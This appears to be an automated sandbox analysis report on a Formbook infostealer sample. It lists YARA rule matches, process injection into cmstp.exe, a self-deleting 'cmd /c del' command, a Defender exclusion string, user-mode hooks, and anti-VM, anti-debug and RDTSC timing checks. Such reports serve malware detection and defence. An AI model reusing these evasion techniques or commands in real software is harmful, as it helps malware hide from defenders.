Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: w73FtMA4ZTl9NFm.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/1

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\w73FtMA4ZTl9NFm.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01

Source: w73FtMA4ZTl9NFm.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: w73FtMA4ZTl9NFm.exe	Virustotal: Detection: 30%
Source: w73FtMA4ZTl9NFm.exe	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process created: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process created: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'	Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: w73FtMA4ZTl9NFm.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: w73FtMA4ZTl9NFm.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmstp.pdbGCTL source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.288143631.0000000001910000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.287846325.00000000016BF000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.287846325.00000000016BF000.00000040.00000001.sdmp, cmstp.exe
Source:	Binary string: cmstp.pdb source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.288143631.0000000001910000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_00FD94E5 push cs; iretd	1_2_00FD94E6
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_00FD9485 push cs; ret	1_2_00FD9492
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00404A36 push edi; iretd	3_2_00404A38
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00417296 push ebx; iretd	3_2_0041729B
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00409BAC push es; ret	3_2_00409BAD
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041CEF2 push eax; ret	3_2_0041CEF8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041CEFB push eax; ret	3_2_0041CF62
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041CEA5 push eax; ret	3_2_0041CEF8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041CF5C push eax; ret	3_2_0041CF62
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00B09485 push cs; ret	3_2_00B09492
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00B094E5 push cs; iretd	3_2_00B094E6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0464D0D1 push ecx; ret	7_2_0464D0E4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00684A36 push edi; iretd	7_2_00684A38
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00697296 push ebx; iretd	7_2_0069729B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069D3F6 pushad ; ret	7_2_0069D3F7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00689BAC push es; ret	7_2_00689BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069D51B pushfd ; retf	7_2_0069D51C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069CEFB push eax; ret	7_2_0069CF62
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069CEF2 push eax; ret	7_2_0069CEF8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069CEA5 push eax; ret	7_2_0069CEF8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069CF5C push eax; ret	7_2_0069CF62

Source: initial sample

Static PE information: section name: .text entropy: 7.93272076919

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xED

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: w73FtMA4ZTl9NFm.exe PID: 3764, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 00000000006898E4 second address: 00000000006898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000000689B4E second address: 0000000000689B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Code function: 3_2_00409A80 rdtsc

3_2_00409A80

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe TID: 4828	Thread sleep time: -103651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe TID: 4660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5112	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5112	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 6404	Thread sleep time: -65000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Thread delayed: delay time: 103651			Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000004.00000000.272467225.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.272467225.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.272641165.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.523676868.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.272641165.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.260612943.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000004.00000000.272641165.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000004.00000000.272543308.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000004.00000000.272467225.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000004.00000000.272543308.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.265973100.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000002.523676868.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000002.523676868.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000002.523676868.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Code function: 3_2_00409A80 rdtsc

3_2_00409A80

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Code function: 3_2_0040ACC0 LdrLoadDll,

3_2_0040ACC0

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461746D mov eax, dword ptr fs:[00000030h]	7_2_0461746D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B2073 mov eax, dword ptr fs:[00000030h]	7_2_046B2073
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C1074 mov eax, dword ptr fs:[00000030h]	7_2_046C1074
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A44B mov eax, dword ptr fs:[00000030h]	7_2_0462A44B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04610050 mov eax, dword ptr fs:[00000030h]	7_2_04610050
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04610050 mov eax, dword ptr fs:[00000030h]	7_2_04610050
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468C450 mov eax, dword ptr fs:[00000030h]	7_2_0468C450
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468C450 mov eax, dword ptr fs:[00000030h]	7_2_0468C450
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460B02A mov eax, dword ptr fs:[00000030h]	7_2_0460B02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460B02A mov eax, dword ptr fs:[00000030h]	7_2_0460B02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460B02A mov eax, dword ptr fs:[00000030h]	7_2_0460B02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460B02A mov eax, dword ptr fs:[00000030h]	7_2_0460B02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462BC2C mov eax, dword ptr fs:[00000030h]	7_2_0462BC2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462002D mov eax, dword ptr fs:[00000030h]	7_2_0462002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462002D mov eax, dword ptr fs:[00000030h]	7_2_0462002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462002D mov eax, dword ptr fs:[00000030h]	7_2_0462002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462002D mov eax, dword ptr fs:[00000030h]	7_2_0462002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462002D mov eax, dword ptr fs:[00000030h]	7_2_0462002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C740D mov eax, dword ptr fs:[00000030h]	7_2_046C740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C740D mov eax, dword ptr fs:[00000030h]	7_2_046C740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C740D mov eax, dword ptr fs:[00000030h]	7_2_046C740D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1C06 mov eax, dword ptr fs:[00000030h]	7_2_046B1C06
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676C0A mov eax, dword ptr fs:[00000030h]	7_2_04676C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676C0A mov eax, dword ptr fs:[00000030h]	7_2_04676C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676C0A mov eax, dword ptr fs:[00000030h]	7_2_04676C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676C0A mov eax, dword ptr fs:[00000030h]	7_2_04676C0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677016 mov eax, dword ptr fs:[00000030h]	7_2_04677016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677016 mov eax, dword ptr fs:[00000030h]	7_2_04677016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677016 mov eax, dword ptr fs:[00000030h]	7_2_04677016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C4015 mov eax, dword ptr fs:[00000030h]	7_2_046C4015
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C4015 mov eax, dword ptr fs:[00000030h]	7_2_046C4015
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B14FB mov eax, dword ptr fs:[00000030h]	7_2_046B14FB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676CF0 mov eax, dword ptr fs:[00000030h]	7_2_04676CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676CF0 mov eax, dword ptr fs:[00000030h]	7_2_04676CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676CF0 mov eax, dword ptr fs:[00000030h]	7_2_04676CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F58EC mov eax, dword ptr fs:[00000030h]	7_2_045F58EC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0468B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov ecx, dword ptr fs:[00000030h]	7_2_0468B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0468B8D0
